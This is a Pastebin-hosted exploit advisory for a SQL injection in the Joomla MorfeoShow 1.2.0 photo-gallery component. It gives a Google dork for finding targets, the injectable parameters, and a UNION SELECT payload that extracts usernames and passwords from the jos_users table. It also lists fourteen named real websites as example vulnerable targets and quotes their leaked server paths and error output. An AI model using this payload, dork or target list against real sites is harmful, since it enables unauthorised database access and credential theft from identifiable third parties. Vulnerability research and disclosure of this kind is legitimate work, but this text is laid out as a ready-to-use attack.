Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####################################################################
- # Exploit Title : Joomla MorfeoShow Components 1.2.0 SQL Injection
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 31/01/2019
- # Vendor Homepage : joomla4ever.org
- # Software Download Link : joomla4ever.org/archive/ext/com_morfeoshow.zip
- # Software Information Link : joomla4ever.org/extensions/ext-morfeoshow
- # Software Version : 1.2.0
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : inurl:''/index.php?option=com_morfeoshow''
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- # Reference Link : cxsecurity.com/issue/WLB-2019010300
- packetstormsecurity.com/files/151432/Joomla-MorfeoShow-1.2.0-SQL-Injection.html
- ####################################################################
- # Description about Software :
- ***************************
- MorfeoShow - Photo Gallery for Joomla 1.5 + plugin to insert photos in the site's content!
- ####################################################################
- # Impact :
- ***********
- * An attacker might be able inject and/or alter existing
- SQL statements which would influence the database exchange.
- * SQL injection vulnerability in the Joomla MorfeoShow Components 1.2.0 because,
- it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
- * On the other hand, this component MorfeoShow for Joomla! allows
- remote attackers to execute arbitrary SQL commands
- via the " Itemid=, gallery=, idm= "
- with different parameters action to index.php.
- * Exploiting this issue could allow an attacker to compromise the application, read,
- access or modify data, or exploit latent vulnerabilities in the underlying database.
- If the webserver is misconfigured, read & write access to the filesystem may be possible.
- ####################################################################
- # SQL Injection Exploit :
- **********************
- /index.php?option=com_morfeoshow&Itemid=[SQL Injection]
- /index.php?option=com_morfeoshow&task=view&gallery=[SQL Injection]
- /index.php?option=com_morfeoshow&task=view&gallery=[ID-NUMBER]&Itemid=[SQL Injection]
- /index.php?option=com_morfeoshow&task=view&gallery=[ID-NUMBER]&Itemid=[ID-NUMBER]&Itemid=[ID-NUMBER]&idm=[SQL Injection]
- # SQL Injection Exploit Payload :
- *****************************
- +and+1=0+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+jos_users+--+
- ####################################################################
- # Example Vulnerable Sites :
- *************************
- [+] iccrucoli.gov.it/old/index.php?option=com_morfeoshow&Itemid=8%27
- [+] scuolaprimolevi.it/index.php?option=com_morfeoshow&task=view&gallery=2&Itemid=7%27
- [+] elsemillero.net/nuevo/index.php?option=com_morfeoshow&Itemid=163%27
- [+] thecountrychurch.com/index.php?option=com_morfeoshow&task=view&gallery=9%27
- [+] funlec.com.br/biblioteca/index.php?option=com_morfeoshow&task=view&gallery=12&Itemid=199%27
- [+] eolopress.it/eolo/index.php?option=com_morfeoshow&task=view&gallery=16&Itemid=258%27
- [+] tarnafjallens.se/index.php?option=com_morfeoshow&task=view&gallery=1&Itemid=63%27
- [+] cworksmobile.com/clab/index.php?option=com_morfeoshow&task=view&gallery=8%27
- [+] zetech.pl/joomla/index.php?option=com_morfeoshow&task=view&gallery=2&Itemid=38%27
- [+] floradoceara.com.br/index.php?option=com_morfeoshow&task=view&gallery=5&Itemid=13%27
- [+] danilson.com.br/index.php?option=com_morfeoshow&task=view&gallery=2&Itemid=105%27
- [+] 2010nw.co.za/index.php?option=com_morfeoshow&task=view&gallery=1%27
- [+] eltoritosantandereano.com/index.php?option=com_morfeoshow&Itemid=66%27
- [+] uspr.fr/index.php?option=com_morfeoshow&Itemid=63%27
- ####################################################################
- # Example SQL Database Error :
- ****************************
- Message: Invalid controller specified (index.php) at line 242 in
- /var/www/novamelodica.nl/lib/Zend/Controller/Dispatcher/Standard.php
- Strict Standards: Non-static method JLoader::import() should not be
- called statically in /home/elsemillero/public_html
- /nuevo/libraries/joomla/import.php on line 29
- Strict Standards: Non-static method JApplication::getTemplate() should not be
- called statically in /home/primolevi/domains/scuolaprimolevi.it/public_html
- /libraries/joomla/application/helper.php on line 195 Strict Standards:
- Only variables should be assigned by reference in /home/primolevi/domains
- /scuolaprimolevi.it/public_html/components/com_morfeoshow
- /morfeoshow.php on line 22
- jos-Warning: Error loading component: com_morfeoshow, 1
- JSite -> dispatch() @ /home/country/public_html/index.php:42
- JComponentHelper :: renderComponent() @
- /home/country/public_html/includes/application.php:194
- Fatal error: Uncaught exception 'RuntimeException' with message
- 'Unknown column 'header' in 'field list' SQL=SELECT `new_url`,`header`,
- `published` FROM `edlpm_redirect_links` WHERE `old_url` =
- 'http://www.uspr.fr/index.php?option=com_morfeoshow&Itemid=63'
- LIMIT 0, 1' in /homepages/37/d176518689/htdocs/libraries/joomla
- /database/driver/mysql.php:332 Stack trace: #0 /homepages/37/d176518689
- /htdocs/libraries/joomla/database/driver.php(1239): JDatabaseDriverMysql->
- execute() #1 /homepages/37/d176518689/htdocs/plugins/system/redirect
- /redirect.php(86): JDatabaseDriver->loadObject() #2 [internal function]:
- PlgSystemRedirect::handleError(Object(Exception)) #3 {main} thrown
- in /homepages/37/d176518689/htdocs/libraries
- /joomla/database/driver/mysql.php on line 332
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
Add Comment
Please, Sign In to add comment